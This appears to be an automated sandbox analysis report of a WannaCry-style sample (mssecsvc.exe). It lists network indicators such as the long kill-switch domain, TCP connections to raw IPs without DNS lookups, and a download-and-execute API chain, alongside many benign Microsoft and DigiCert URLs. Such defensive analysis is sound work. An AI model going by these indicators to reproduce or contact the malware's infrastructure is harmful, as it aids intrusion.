Source: unknown	TCP traffic detected without corresponding DNS query: 209.135.205.16
Source: unknown	TCP traffic detected without corresponding DNS query: 209.135.205.1
Source: unknown	TCP traffic detected without corresponding DNS query: 209.135.205.1
Source: unknown	TCP traffic detected without corresponding DNS query: 209.135.205.1
Source: unknown	TCP traffic detected without corresponding DNS query: 209.135.205.1
Source: unknown	TCP traffic detected without corresponding DNS query: 209.135.205.1
Source: unknown	TCP traffic detected without corresponding DNS query: 209.135.205.1
Source: unknown	TCP traffic detected without corresponding DNS query: 198.232.135.223
Source: unknown	TCP traffic detected without corresponding DNS query: 198.232.135.223
Source: unknown	TCP traffic detected without corresponding DNS query: 198.232.135.223
Source: unknown	TCP traffic detected without corresponding DNS query: 198.232.135.1
Source: unknown	TCP traffic detected without corresponding DNS query: 198.232.135.223
Source: unknown	TCP traffic detected without corresponding DNS query: 198.232.135.1
Source: unknown	TCP traffic detected without corresponding DNS query: 198.232.135.1
Source: unknown	TCP traffic detected without corresponding DNS query: 198.232.135.1
Source: unknown	TCP traffic detected without corresponding DNS query: 198.232.135.1
Source: unknown	TCP traffic detected without corresponding DNS query: 198.232.135.1
Source: unknown	TCP traffic detected without corresponding DNS query: 198.232.135.1
Source: unknown	TCP traffic detected without corresponding DNS query: 112.84.177.245
Source: unknown	TCP traffic detected without corresponding DNS query: 112.84.177.245

Source: C:\Windows\mssecsvc.exe

Code function: 6_2_00AD27A7 GetTempFileNameA,CreateFileA,InternetReadFile,WriteFile,CloseHandle,CreateProcessA,InternetCloseHandle,InternetCloseHandle,

6_2_00AD27A7

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

Source: Microsoft-Windows-LiveId%4Operational.evtx.27.dr	String found in binary or memory: http://Passport.NET/tb
Source: WebCacheV01.dat.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
Source: WebCacheV01.dat.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 00000008.00000003.1682122616.00000213BD59E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1474761749.00000213BD5AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1473262535.00000213BCE49000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2758510692.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1474607649.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2757569984.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.1654010092.00000213BD59C000.00000004.00000001.00020000.00000000.sdmp, dllhost.exe, 0000000E.00000003.1497676940.00000184B151D000.00000004.00000800.00020000.00000000.sdmp, WebCacheV01.dat.14.dr, V01.log.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 00000008.00000003.1682122616.00000213BD59E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2758510692.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1474761749.00000213BD59E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2755458169.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1473874337.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1474607649.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2757569984.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.1654010092.00000213BD59C000.00000004.00000001.00020000.00000000.sdmp, WebCacheV01.dat.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: WebCacheV01.dat.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: WebCacheV01.dat.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: lsass.exe, 00000008.00000002.2749131736.00000213BCE89000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: WebCacheV01.dat.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: WebCacheV01.dat.14.dr, V01.log.14.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: WebCacheV01.dat.14.dr	String found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
Source: WebCacheV01.dat.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
Source: WebCacheV01.dat.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 00000008.00000003.1682122616.00000213BD59E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1474761749.00000213BD5AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1473262535.00000213BCE49000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2758510692.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1474607649.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2757569984.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.1654010092.00000213BD59C000.00000004.00000001.00020000.00000000.sdmp, dllhost.exe, 0000000E.00000003.1497676940.00000184B151D000.00000004.00000800.00020000.00000000.sdmp, WebCacheV01.dat.14.dr, V01.log.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: WebCacheV01.dat.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000008.00000003.1682122616.00000213BD59E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2758510692.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1474761749.00000213BD59E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2755458169.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1473874337.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1474607649.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2757569984.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.1654010092.00000213BD59C000.00000004.00000001.00020000.00000000.sdmp, WebCacheV01.dat.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000008.00000002.2749131736.00000213BCE89000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: WebCacheV01.dat.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: lsass.exe, 00000008.00000003.1682122616.00000213BD59E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1474761749.00000213BD5AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1474607649.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2757569984.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.1654010092.00000213BD59C000.00000004.00000001.00020000.00000000.sdmp, dllhost.exe, 0000000E.00000003.1497676940.00000184B151D000.00000004.00000800.00020000.00000000.sdmp, WebCacheV01.dat.14.dr, V01.log.14.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: WebCacheV01.dat.14.dr	String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: WebCacheV01.dat.14.dr	String found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: lsass.exe, 00000008.00000000.1474607649.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, WebCacheV01.dat.14.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: WebCacheV01.dat.14.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: WebCacheV01.dat.14.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
Source: WebCacheV01.dat.14.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 00000008.00000003.1682122616.00000213BD59E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2758510692.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1474761749.00000213BD59E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2755458169.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1473874337.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1474607649.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2757569984.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.1654010092.00000213BD59C000.00000004.00000001.00020000.00000000.sdmp, WebCacheV01.dat.14.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: WebCacheV01.dat.14.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: WebCacheV01.dat.14.dr, V01.log.14.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: WebCacheV01.dat.14.dr	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: WebCacheV01.dat.14.dr	String found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
Source: lsass.exe, 00000008.00000002.2750188287.00000213BCEB8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1473505535.00000213BCEB8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000008.00000000.1473742432.00000213BD400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2753241698.00000213BD400000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000008.00000000.1473262535.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2746096112.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000008.00000000.1473328651.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2747533073.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000008.00000000.1473262535.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2746096112.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: dllhost.exe, 0000000E.00000003.1497676940.00000184B1510000.00000004.00000800.00020000.00000000.sdmp, V01.log.14.dr	String found in binary or memory: http://ocsp.digice
Source: lsass.exe, 00000008.00000003.1682122616.00000213BD59E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1474761749.00000213BD5AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1473262535.00000213BCE49000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2758510692.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1474761749.00000213BD59E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2755458169.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1473874337.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1474607649.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2757569984.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.1654010092.00000213BD59C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2749131736.00000213BCE89000.00000004.00000001.00020000.00000000.sdmp, dllhost.exe, 0000000E.00000003.1497676940.00000184B151D000.00000004.00000800.00020000.00000000.sdmp, WebCacheV01.dat.14.dr, V01.log.14.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000008.00000000.1474607649.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, WebCacheV01.dat.14.dr	String found in binary or memory: http://ocsp.digicert.com0:
Source: WebCacheV01.dat.14.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 00000008.00000003.1682122616.00000213BD59E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1474761749.00000213BD5AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1474607649.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2757569984.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.1654010092.00000213BD59C000.00000004.00000001.00020000.00000000.sdmp, dllhost.exe, 0000000E.00000003.1497676940.00000184B151D000.00000004.00000800.00020000.00000000.sdmp, WebCacheV01.dat.14.dr, V01.log.14.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: WebCacheV01.dat.14.dr	String found in binary or memory: http://ocsp.digicert.com0Q
Source: lsass.exe, 00000008.00000000.1474607649.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, WebCacheV01.dat.14.dr	String found in binary or memory: http://ocsp.msocsp.com0
Source: WebCacheV01.dat.14.dr	String found in binary or memory: http://ocsp.msocsp.com0S
Source: WebCacheV01.dat.14.dr	String found in binary or memory: http://ocspx.digicert.com0E
Source: svchost.exe, 0000001A.00000002.2755459692.000001486A5B0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: lsass.exe, 00000008.00000000.1473262535.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2746096112.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000008.00000000.1473262535.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2746096112.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: lsass.exe, 00000008.00000000.1473262535.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1473328651.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2747533073.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2746096112.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000008.00000000.1473262535.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2746096112.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000008.00000000.1473262535.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2746096112.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000008.00000000.1473262535.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2746096112.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: WebCacheV01.dat.14.dr, V01.log.14.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: WebCacheV01.dat.14.dr	String found in binary or memory: http://www.digicert.com/CPS0~
Source: mssecsvc.exe.4.dr	String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Source: mssecsvc.exe, 0000000C.00000002.1694346996.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, mssecsvc.exe, 00000011.00000003.1638909218.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, mssecsvc.exe, 00000011.00000002.2280369063.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
Source: mssecsvc.exe, 0000000C.00000002.1694346996.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/(
Source: mssecsvc.exe, 0000000C.00000002.1694346996.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/)
Source: mssecsvc.exe, 00000006.00000002.1710923691.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/22www.iuqerfsodp9ifjaposdfjhgosurijfaewrwer
Source: mssecsvc.exe, 00000006.00000002.1710923691.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/R
Source: mssecsvc.exe, 0000000C.00000002.1694346996.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/a
Source: mssecsvc.exe, 0000000C.00000002.1694346996.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/hL
Source: mssecsvc.exe, 0000000C.00000002.1694346996.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, mssecsvc.exe, 00000011.00000002.2280369063.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com0
Source: mssecsvc.exe, 00000006.00000002.1709689615.000000000019D000.00000004.00000010.00020000.00000000.sdmp, mssecsvc.exe, 0000000C.00000002.1693037455.000000000019C000.00000004.00000010.00020000.00000000.sdmp, mssecsvc.exe, 00000011.00000002.2279550385.000000000019D000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ
Source: svchost.exe, 00000022.00000000.1576769823.000001F173E83000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.msftconnecttest.com
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?5b3bec92835bc024c52f96dd
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?f0f7e1407b69bd65640be717
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f343d3a8731ffea490b8b5c3
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f92d19bcbba8eb1999dabbc8
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=LO
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: WebCacheV01.dat.14.dr, V01.log.14.dr	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: svchost.exe, 00000009.00000000.1487402449.00000138EDA6B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.2772308000.00000138EDA6B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://az804205.vo.msecnd.net/
Source: svchost.exe, 00000009.00000000.1487402449.00000138EDA6B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.2772308000.00000138EDA6B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://az804205.vo.msecnd.net/f
Source: svchost.exe, 00000009.00000002.2772308000.00000138EDA6B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://az815563.vo.msecnd.net/
Source: svchost.exe, 00000009.00000000.1487448821.00000138EDAA3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.2771771623.00000138EDA5F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000000.1487356023.00000138EDA5F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.2772678046.00000138EDAA3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000000.1487402449.00000138EDA6B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.2772308000.00000138EDA6B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.onenote.net/livetile/?Language=
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: dllhost.exe, 0000000E.00000003.1497676940.00000184B1519000.00000004.00000800.00020000.00000000.sdmp, WebCacheV01.dat.14.dr, V01.log.14.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5a&
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=MIRA-WW-PH7&FrontEn
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-08-30-16/PreSignInSettingsConfig.json
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=13164f2a9ee6956f1439
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=b92552
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: WebCacheV01.dat.14.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
